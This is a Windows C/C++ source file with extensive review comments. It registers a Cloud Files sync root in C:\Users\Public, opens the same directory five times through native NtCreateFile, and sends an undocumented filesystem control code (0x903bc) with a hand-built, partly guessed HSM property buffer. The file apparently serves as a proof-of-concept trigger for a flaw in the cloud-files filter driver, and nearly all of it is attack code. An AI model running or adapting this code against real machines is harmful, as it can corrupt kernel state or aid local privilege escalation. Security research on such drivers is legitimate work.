#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <direct.h>
#include <io.h>
#include <winsock2.h>
#include <windows.h>
#include <cfapi.h>
#include <tchar.h>
#include <winternl.h>
#include <fileapi.h>
#include <wchar.h>
#include <ctype.h>
#include <fltuser.h>
#pragma comment(lib, "fltLib.lib")
#pragma comment(lib, "CldApi.lib")
#pragma comment(lib, "ntdll.lib")
// NOTE: despite the .c file name this translation unit relies on C++ semantics:
// the parameter-less variadic typedefs below, the `= {}` initialisers and the
// brace-assignment to reg.ProviderId in main() are not valid C.  Build as C++.
//
// Dynamic initialiser: ntdll.dll is already mapped into every Win32 process, so
// this is not expected to fail, but the result is never checked.  A NULL module
// would make the two GetProcAddress() lookups below return NULL, which main()
// then calls through unconditionally.  Declaration order matters: _g_ntdll must
// be initialised before the lookups that read it.
// Reviewer note: file-scope names beginning with '_' (and any name beginning
// with '_' + uppercase) are reserved for the implementation.
static HMODULE _g_ntdll = LoadLibraryA("ntdll.dll");

// Parameter-less variadic prototype: the call site in main() gets no argument
// type-checking.  The native routine returns NTSTATUS (a 32-bit LONG), not
// long long; harmless here only because the callers discard the result.
typedef long long (WINAPI* PNtFsControlFile)(...);

// Resolved once at load time; NULL if the lookup fails (not checked).
PNtFsControlFile _NtFsControlFile = (PNtFsControlFile)GetProcAddress(_g_ntdll, "NtFsControlFile");

// Same caveats as PNtFsControlFile: no argument checking, return type wider
// than the real NTSTATUS.
typedef long long (WINAPI* PNtCreateFile)(...);

// Resolved once at load time; NULL if the lookup fails (not checked).
PNtCreateFile _NtCreateFile = (PNtCreateFile)GetProcAddress(_g_ntdll, "NtCreateFile");

// Callback table containing only the terminator: the sync root is connected
// with no provider callbacks registered at all.
static CF_CALLBACK_REGISTRATION callbackTable[] = {
    CF_CALLBACK_REGISTRATION_END
};

// Number of handles opened on the same path in main(), and the number of
// FSCTLs issued (one per handle).
#define COUNT 5
// Handles filled in by NtCreateFile in main(); static storage, so zero until
// set.  They are never closed.
HANDLE r[COUNT] = { };

// Entry point.  Registers and connects a Cloud Files sync root under the
// world-writable C:\Users\Public, opens the same child path COUNT times as a
// directory, and sends one FSCTL (code 0x903bc) carrying a hand-built
// HSM_PROPERTY_OPERATION buffer through each handle.
//
// Nothing is checked and nothing is cleaned up: every Cf*/Nt* return value is
// discarded, the COUNT handles are never closed, and the sync root is neither
// disconnected (CfDisconnectSyncRoot) nor unregistered (CfUnregisterSyncRoot),
// so the registration and the directory persist on the machine after the
// process exits.  Running it twice re-registers the same path.
int main(void)
{
    // Public profile directory: writable by every local user.
    LPCWSTR SyncRootPath = L"C:\\Users\\Public\\SYNC_ROOT_5";
    CF_CONNECTION_KEY key = {};
    CF_SYNC_REGISTRATION reg = {};
    reg.StructSize = sizeof(reg);
    reg.ProviderName = L"TestProvider";
    reg.ProviderVersion = L"1234";
    // Arbitrary provider GUID with an all-zero Data4; not a registered provider.
    reg.ProviderId = { 0xB196E670, 0x59C7, 0x4D41, {0} };

    CF_SYNC_POLICIES pol = {};
    pol.StructSize = sizeof(pol);
    pol.HardLink = CF_HARDLINK_POLICY_ALLOWED;
    pol.InSync = CF_INSYNC_POLICY_NONE;
    pol.Hydration.Primary = CF_HYDRATION_POLICY_PARTIAL;
    pol.Population.Primary = CF_POPULATION_POLICY_PARTIAL;

    // Return values (BOOL / HRESULT) are discarded: a failed directory
    // creation, registration or connection is not detected and execution
    // continues regardless.
    CreateDirectory(SyncRootPath, NULL);
    CfRegisterSyncRoot(SyncRootPath, &reg, &pol, CF_REGISTER_FLAG_NONE);
    CfConnectSyncRoot(SyncRootPath, callbackTable, NULL, CF_CONNECT_FLAG_NONE, &key);

    // Open the SAME path COUNT times (the loop index is not part of the name)
    // as a directory, creating it if absent (FILE_OPEN_IF + FILE_DIRECTORY_FILE).
    // The NT-form path is a second hard-coded copy of SyncRootPath; the two
    // literals must be kept in step by hand.  0x40 is OBJ_CASE_INSENSITIVE.
    // No FILE_SYNCHRONOUS_IO_* option is requested, so the handles are
    // asynchronous.  The NTSTATUS is not checked: a failed open leaves r[i]
    // at its zero initial value.
    for (int i = 0; i < COUNT; i++) {
        IO_STATUS_BLOCK iosb = {};
        OBJECT_ATTRIBUTES objAttr = {};
        UNICODE_STRING objName = {};
        RtlInitUnicodeString(&objName, L"\\??\\C:\\Users\\Public\\SYNC_ROOT_5\\testfile_0");
        InitializeObjectAttributes(&objAttr, &objName, 0x40, 0, NULL);
        _NtCreateFile(&r[i], GENERIC_READ | GENERIC_WRITE, &objAttr, &iosb, NULL, 0,
            FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN_IF,
            FILE_DIRECTORY_FILE, NULL, 0);
    }

    // Hand-rolled layout of the FSCTL input buffer.  `typedef struct X {...};`
    // declares no typedef name (MSVC warns); the tag is usable as a type only
    // because this is C++.  Field names and meanings are the author's
    // reconstruction, not a public SDK definition — treat them as assumptions.
    typedef struct HSM_PROPERTY_ENTRY {
        uint32_t PropertyId;
        uint32_t Flags;
        uint64_t Value;
        uint32_t ValueSize;
        uint32_t Reserved;
    };  // 4+4+8+4+4 = 24 bytes per entry

    typedef struct HSM_PROPERTY_OPERATION {
        uint32_t ReparseTag;
        uint32_t Operation;
        uint32_t Exclusive;
        uint32_t Reserved;
        uint32_t HeaderSize;
        uint32_t PropertyCount;
        uint64_t CorrelationKey;  // header ends here: 6*4 + 8 = 0x20 bytes
        HSM_PROPERTY_ENTRY Properties[5];
    };
    HSM_PROPERTY_OPERATION p;
    memset(&p, 0, sizeof(p));
    p.ReparseTag = 0x9000001A;   // IO_REPARSE_TAG_CLOUD
    p.Operation = 0xC0000021;    // meaning not established on this page
    p.Exclusive = 0;
    p.HeaderSize = 0x20;         // equals the size of the fields preceding Properties
    p.PropertyCount = 1;         // only Properties[0] is populated; all 5 are sent (sizeof(p))
    p.CorrelationKey = 0x1234;
    p.Properties[0].PropertyId = 0x999932a0;  // meaning not established on this page

    // Issue the same FSCTL with the same input buffer through each handle: no
    // event, no APC, no output buffer, NTSTATUS discarded.  0x903bc is not one
    // of the public FSCTL_* constants used on this page — presumably a
    // filter-private control code; confirm against the target driver.  Since
    // the handles are asynchronous and nothing waits for completion, a
    // STATUS_PENDING return could leave the I/O manager completing into `isb`
    // after it has gone out of scope at the end of the iteration.
    for (int i = 0; i < COUNT; i++) {
        IO_STATUS_BLOCK isb;
        _NtFsControlFile(r[i], NULL, NULL, NULL, &isb, 0x903bc, &p, sizeof(p), NULL, NULL);
    }

    return 0;
}